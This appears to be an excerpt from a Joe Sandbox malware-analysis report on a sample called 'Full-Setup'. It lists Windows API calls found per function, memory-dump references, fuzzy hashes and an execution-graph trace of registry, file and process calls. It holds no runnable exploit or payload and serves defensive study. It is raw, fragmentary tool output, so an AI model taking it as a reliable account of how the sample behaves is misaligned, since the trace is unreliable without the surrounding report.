                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                          • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                          • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                          • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                          • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2883127279-0
                                                                                                                                                                          • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                          • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                          • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                          • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                          • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                          • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                          • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                          • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                          • String ID: !N~
                                                                                                                                                                          • API String ID: 623250636-529124213
                                                                                                                                                                          • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                          • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                          • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                          • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                          Strings
                                                                                                                                                                          • Error launching installer, xrefs: 00405C74
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                          • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                          • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                          • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                          • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                            • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                          • API String ID: 3509786178-2769509956
                                                                                                                                                                          • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                          • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                          • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                          • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                          • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                          • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                          • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                          • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                          • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:3.3%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:3.3%
                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                          Total number of Limit Nodes:66
                                                                                                                                                                          execution_graph 96253 381098 96258 385fc8 96253->96258 96257 3810a7 96279 38bf73 96258->96279 96262 38602c 96277 386062 96262->96277 96296 38adf4 96262->96296 96264 386056 96300 3855dc 96264->96300 96265 38611c GetCurrentProcess IsWow64Process 96267 386138 96265->96267 96268 3c5269 GetSystemInfo 96267->96268 96269 386150 LoadLibraryA 96267->96269 96270 38619d GetSystemInfo 96269->96270 96271 386161 GetProcAddress 96269->96271 96272 386177 96270->96272 96271->96270 96274 386171 GetNativeSystemInfo 96271->96274 96275 38617b FreeLibrary 96272->96275 96276 38109d 96272->96276 96273 3c5224 96274->96272 96275->96276 96278 3a0413 29 API calls __onexit 96276->96278 96277->96265 96277->96273 96278->96257 96304 3a017b 96279->96304 96281 38bf88 96313 3a014b 96281->96313 96283 385fdf GetVersionExW 96284 388577 96283->96284 96285 3c6610 96284->96285 96286 388587 _wcslen 96284->96286 96287 38adf4 8 API calls 96285->96287 96289 38859d 96286->96289 96290 3885c2 96286->96290 96288 3c6619 96287->96288 96288->96288 96328 3888e8 8 API calls 96289->96328 96291 3a014b 8 API calls 96290->96291 96293 3885ce 96291->96293 96295 3a017b 8 API calls 96293->96295 96294 3885a5 __fread_nolock 96294->96262 96295->96294 96297 38ae0b __fread_nolock 96296->96297 96298 38ae02 96296->96298 96297->96264 96298->96297 96329 38c2c9 96298->96329 96301 3855ea 96300->96301 96302 38adf4 8 API calls 96301->96302 96303 3855fe 96302->96303 96303->96277 96305 3a014b ___std_exception_copy 96304->96305 96306 3a016a 96305->96306 96309 3a016c 96305->96309 96322 3a521d 7 API calls 2 library calls 96305->96322 96306->96281 96308 3a09dd 96324 3a3614 RaiseException 96308->96324 96309->96308 96323 3a3614 RaiseException 96309->96323 96311 3a09fa 96311->96281 96315 3a0150 ___std_exception_copy 96313->96315 96314 3a016a 96314->96283 96315->96314 96318 3a016c 96315->96318 96325 3a521d 7 API calls 2 library calls 96315->96325 96317 3a09dd 96327 3a3614 RaiseException 96317->96327 96318->96317 96326 3a3614 RaiseException 96318->96326 96320 3a09fa 96320->96283 96322->96305 96323->96308 96324->96311 96325->96315 96326->96317 96327->96320 96328->96294 96330 38c2dc 96329->96330 96334 38c2d9 __fread_nolock 96329->96334 96331 3a014b 8 API calls 96330->96331 96332 38c2e7 96331->96332 96333 3a017b 8 API calls 96332->96333 96333->96334 96334->96297 96335 3b947a 96336 3b949f 96335->96336 96337 3b9487 96335->96337 96341 3b94fa 96336->96341 96349 3b9497 96336->96349 96394 3c0144 21 API calls 2 library calls 96336->96394 96392 3af649 20 API calls _abort 96337->96392 96339 3b948c 96393 3b2b5c 26 API calls _strftime 96339->96393 96355 3adcc5 96341->96355 96344 3b9512 96362 3b8fb2 96344->96362 96346 3b9519 96347 3adcc5 __fread_nolock 26 API calls 96346->96347 96346->96349 96348 3b9545 96347->96348 96348->96349 96350 3adcc5 __fread_nolock 26 API calls 96348->96350 96351 3b9553 96350->96351 96351->96349 96352 3adcc5 __fread_nolock 26 API calls 96351->96352 96353 3b9563 96352->96353 96354 3adcc5 __fread_nolock 26 API calls 96353->96354 96354->96349 96356 3adcd1 96355->96356 96357 3adce6 96355->96357 96395 3af649 20 API calls _abort 96356->96395 96357->96344 96359 3adcd6 96396 3b2b5c 26 API calls _strftime 96359->96396 96361 3adce1 96361->96344 96363 3b8fbe ___DestructExceptionObject 96362->96363 96364 3b8fde 96363->96364 96365 3b8fc6 96363->96365 96367 3b90a4 96364->96367 96371 3b9017 96364->96371 96463 3af636 20 API calls _abort 96365->96463 96470 3af636 20 API calls _abort 96367->96470 96368 3b8fcb 96464 3af649 20 API calls _abort 96368->96464 96373 3b903b 96371->96373 96374 3b9026 96371->96374 96372 3b90a9 96471 3af649 20 API calls _abort 96372->96471 96397 3b54ba EnterCriticalSection 96373->96397 96465 3af636 20 API calls _abort 96374->96465 96378 3b9041 96381 3b905d 96378->96381 96382 3b9072 96378->96382 96379 3b9033 96472 3b2b5c 26 API calls _strftime 96379->96472 96380 3b902b 96466 3af649 20 API calls _abort 96380->96466 96467 3af649 20 API calls _abort 96381->96467 96398 3b90c5 96382->96398 96386 3b8fd3 __fread_nolock 96386->96346 96388 3b9062 96468 3af636 20 API calls _abort 96388->96468 96389 3b906d 96469 3b909c LeaveCriticalSection __wsopen_s 96389->96469 96392->96339 96393->96349 96394->96341 96395->96359 96396->96361 96397->96378 96399 3b90ef 96398->96399 96400 3b90d7 96398->96400 96402 3b9459 96399->96402 96407 3b9134 96399->96407 96489 3af636 20 API calls _abort 96400->96489 96512 3af636 20 API calls _abort 96402->96512 96403 3b90dc 96490 3af649 20 API calls _abort 96403->96490 96406 3b945e 96513 3af649 20 API calls _abort 96406->96513 96408 3b90e4 96407->96408 96410 3b913f 96407->96410 96414 3b916f 96407->96414 96408->96389 96491 3af636 20 API calls _abort 96410->96491 96411 3b914c 96514 3b2b5c 26 API calls _strftime 96411->96514 96413 3b9144 96492 3af649 20 API calls _abort 96413->96492 96417 3b9188 96414->96417 96418 3b91ca 96414->96418 96419 3b91ae 96414->96419 96417->96419 96453 3b9195 96417->96453 96473 3b3b93 96418->96473 96493 3af636 20 API calls _abort 96419->96493 96422 3b91b3 96494 3af649 20 API calls _abort 96422->96494 96427 3b91ba 96495 3b2b5c 26 API calls _strftime 96427->96495 96428 3b91ea 96432 3b2d38 _free 20 API calls 96428->96432 96429 3b93a9 96433 3b93ad ReadFile 96429->96433 96430 3b9333 96430->96429 96434 3b934c GetConsoleMode 96430->96434 96435 3b91f1 96432->96435 96436 3b9421 GetLastError 96433->96436 96437 3b93c7 96433->96437 96434->96429 96438 3b935d 96434->96438 96439 3b91fb 96435->96439 96440 3b9216 96435->96440 96441 3b942e 96436->96441 96442 3b9385 96436->96442 96437->96436 96443 3b939e 96437->96443 96438->96433 96444 3b9363 ReadConsoleW 96438->96444 96502 3af649 20 API calls _abort 96439->96502 96504 3b97a4 96440->96504 96510 3af649 20 API calls _abort 96441->96510 96460 3b91c5 __fread_nolock 96442->96460 96507 3af613 20 API calls __dosmaperr 96442->96507 96456 3b93ec 96443->96456 96457 3b9403 96443->96457 96443->96460 96444->96443 96445 3b937f GetLastError 96444->96445 96445->96442 96446 3b2d38 _free 20 API calls 96446->96408 96451 3b9200 96503 3af636 20 API calls _abort 96451->96503 96452 3b9433 96511 3af636 20 API calls _abort 96452->96511 96480 3bfc1b 96453->96480 96508 3b8de1 31 API calls 3 library calls 96456->96508 96459 3b941a 96457->96459 96457->96460 96509 3b8c21 29 API calls __wsopen_s 96459->96509 96460->96446 96462 3b941f 96462->96460 96463->96368 96464->96386 96465->96380 96466->96379 96467->96388 96468->96389 96469->96386 96470->96372 96471->96379 96472->96386 96474 3b3bd1 96473->96474 96478 3b3ba1 _abort 96473->96478 96516 3af649 20 API calls _abort 96474->96516 96476 3b3bbc RtlAllocateHeap 96477 3b3bcf 96476->96477 96476->96478 96496 3b2d38 96477->96496 96478->96474 96478->96476 96515 3a521d 7 API calls 2 library calls 96478->96515 96481 3bfc28 96480->96481 96482 3bfc35 96480->96482 96517 3af649 20 API calls _abort 96481->96517 96485 3bfc41 96482->96485 96518 3af649 20 API calls _abort 96482->96518 96484 3bfc2d 96484->96430 96485->96430 96487 3bfc62 96519 3b2b5c 26 API calls _strftime 96487->96519 96489->96403 96490->96408 96491->96413 96492->96411 96493->96422 96494->96427 96495->96460 96497 3b2d43 RtlFreeHeap 96496->96497 96498 3b2d6c __dosmaperr 96496->96498 96497->96498 96499 3b2d58 96497->96499 96498->96428 96520 3af649 20 API calls _abort 96499->96520 96501 3b2d5e GetLastError 96501->96498 96502->96451 96503->96460 96521 3b970b 96504->96521 96507->96460 96508->96460 96509->96462 96510->96452 96511->96460 96512->96406 96513->96411 96514->96408 96515->96478 96516->96477 96517->96484 96518->96487 96519->96484 96520->96501 96530 3b5737 96521->96530 96523 3b971d 96524 3b9736 SetFilePointerEx 96523->96524 96525 3b9725 96523->96525 96527 3b974e GetLastError 96524->96527 96528 3b972a 96524->96528 96543 3af649 20 API calls _abort 96525->96543 96544 3af613 20 API calls __dosmaperr 96527->96544 96528->96453 96531 3b5759 96530->96531 96532 3b5744 96530->96532 96538 3b577e 96531->96538 96547 3af636 20 API calls _abort 96531->96547 96545 3af636 20 API calls _abort 96532->96545 96535 3b5749 96546 3af649 20 API calls _abort 96535->96546 96536 3b5789 96548 3af649 20 API calls _abort 96536->96548 96538->96523 96540 3b5751 96540->96523 96541 3b5791 96549 3b2b5c 26 API calls _strftime 96541->96549 96543->96528 96544->96528 96545->96535 96546->96540 96547->96536 96548->96541 96549->96540 96550 38105b 96555 3852a7 96550->96555 96552 38106a 96586 3a0413 29 API calls __onexit 96552->96586 96554 381074 96556 3852b7 __wsopen_s 96555->96556 96557 38bf73 8 API calls 96556->96557 96558 38536d 96557->96558 96587 385594 96558->96587 96560 385376 96594 385238 96560->96594 96567 38bf73 8 API calls 96568 3853a7 96567->96568 96615 38bd57 96568->96615 96571 3c4be6 RegQueryValueExW 96572 3c4c7c RegCloseKey 96571->96572 96573 3c4c03 96571->96573 96575 3853d2 96572->96575 96578 3c4c8e _wcslen 96572->96578 96574 3a017b 8 API calls 96573->96574 96576 3c4c1c 96574->96576 96575->96552 96621 38423c 96576->96621 96578->96575 96580 38655e 8 API calls 96578->96580 96585 386a7c 8 API calls 96578->96585 96624 38b329 96578->96624 96580->96578 96581 3c4c44 96582 388577 8 API calls 96581->96582 96583 3c4c5e messages 96582->96583 96583->96572 96585->96578 96586->96554 96630 3c22d0 96587->96630 96590 38b329 8 API calls 96591 3855c7 96590->96591 96632 385851 96591->96632 96593 3855d1 96593->96560 96595 3c22d0 __wsopen_s 96594->96595 96596 385245 GetFullPathNameW 96595->96596 96597 385267 96596->96597 96598 388577 8 API calls 96597->96598 96599 385285 96598->96599 96600 386b7c 96599->96600 96601 3c57fe 96600->96601 96602 386b93 96600->96602 96604 3a014b 8 API calls 96601->96604 96642 386ba4 96602->96642 96606 3c5808 _wcslen 96604->96606 96605 38538f 96609 386a7c 96605->96609 96607 3a017b 8 API calls 96606->96607 96608 3c5841 __fread_nolock 96607->96608 96610 386a8b 96609->96610 96614 386aac __fread_nolock 96609->96614 96612 3a017b 8 API calls 96610->96612 96611 3a014b 8 API calls 96613 38539e 96611->96613 96612->96614 96613->96567 96614->96611 96616 38bd71 96615->96616 96617 3853b0 RegOpenKeyExW 96615->96617 96618 3a014b 8 API calls 96616->96618 96617->96571 96617->96575 96619 38bd7b 96618->96619 96620 3a017b 8 API calls 96619->96620 96620->96617 96622 3a014b 8 API calls 96621->96622 96623 38424e RegQueryValueExW 96622->96623 96623->96581 96623->96583 96625 38b338 _wcslen 96624->96625 96626 3a017b 8 API calls 96625->96626 96627 38b360 __fread_nolock 96626->96627 96628 3a014b 8 API calls 96627->96628 96629 38b376 96628->96629 96629->96578 96631 3855a1 GetModuleFileNameW 96630->96631 96631->96590 96633 3c22d0 __wsopen_s 96632->96633 96634 38585e GetFullPathNameW 96633->96634 96635 385898 96634->96635 96636 38587d 96634->96636 96638 38bd57 8 API calls 96635->96638 96637 388577 8 API calls 96636->96637 96639 385889 96637->96639 96638->96639 96640 3855dc 8 API calls 96639->96640 96641 385895 96640->96641 96641->96593 96643 386bb4 _wcslen 96642->96643 96644 3c5860 96643->96644 96645 386bc7 96643->96645 96647 3a014b 8 API calls 96644->96647 96652 387d74 96645->96652 96649 3c586a 96647->96649 96648 386bd4 __fread_nolock 96648->96605 96650 3a017b 8 API calls 96649->96650 96651 3c589a __fread_nolock 96650->96651 96653 387d8a 96652->96653 96656 387d85 __fread_nolock 96652->96656 96654 3c6528 96653->96654 96655 3a017b 8 API calls 96653->96655 96655->96656 96656->96648 96657 38f4dc 96660 38cab0 96657->96660 96661 38cacb 96660->96661 96662 3d150c 96661->96662 96663 3d14be 96661->96663 96683 38caf0 96661->96683 96732 4062ff 207 API calls 2 library calls 96662->96732 96666 3d14c8 96663->96666 96669 3d14d5 96663->96669 96663->96683 96730 406790 207 API calls 96666->96730 96682 38cdc0 96669->96682 96731 406c2d 207 API calls 2 library calls 96669->96731 96671 39e807 39 API calls 96671->96683 96674 3d179f 96674->96674 96677 38cdee 96678 3d16e8 96739 406669 81 API calls 96678->96739 96682->96677 96740 3f3fe1 81 API calls __wsopen_s 96682->96740 96683->96671 96683->96677 96683->96678 96683->96682 96687 38cf80 39 API calls 96683->96687 96691 390340 96683->96691 96714 38be2d 96683->96714 96718 39e7c1 39 API calls 96683->96718 96719 39aa99 207 API calls 96683->96719 96720 3a05b2 5 API calls __Init_thread_wait 96683->96720 96721 39bc58 96683->96721 96726 3a0413 29 API calls __onexit 96683->96726 96727 3a0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96683->96727 96728 39f4df 81 API calls 96683->96728 96729 39f346 207 API calls 96683->96729 96733 38b4c8 8 API calls 96683->96733 96734 3dffaf 8 API calls 96683->96734 96735 38bed9 96683->96735 96687->96683 96705 390376 messages 96691->96705 96692 3a0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96692->96705 96693 3d632b 96755 3f3fe1 81 API calls __wsopen_s 96693->96755 96695 391695 96701 38bed9 8 API calls 96695->96701 96709 39049d messages 96695->96709 96696 3a014b 8 API calls 96696->96705 96698 3d625a 96754 3f3fe1 81 API calls __wsopen_s 96698->96754 96699 390aae messages 96753 3f3fe1 81 API calls __wsopen_s 96699->96753 96700 3d5cdb 96704 38bed9 8 API calls 96700->96704 96700->96709 96701->96709 96704->96709 96705->96692 96705->96693 96705->96695 96705->96696 96705->96698 96705->96699 96705->96700 96706 38bed9 8 API calls 96705->96706 96707 3a05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96705->96707 96705->96709 96710 38bf73 8 API calls 96705->96710 96711 3a0413 29 API calls pre_c_initialization 96705->96711 96712 3d6115 96705->96712 96741 391e50 96705->96741 96751 391990 207 API calls 2 library calls 96705->96751 96706->96705 96707->96705 96709->96683 96710->96705 96711->96705 96752 3f3fe1 81 API calls __wsopen_s 96712->96752 96715 38be38 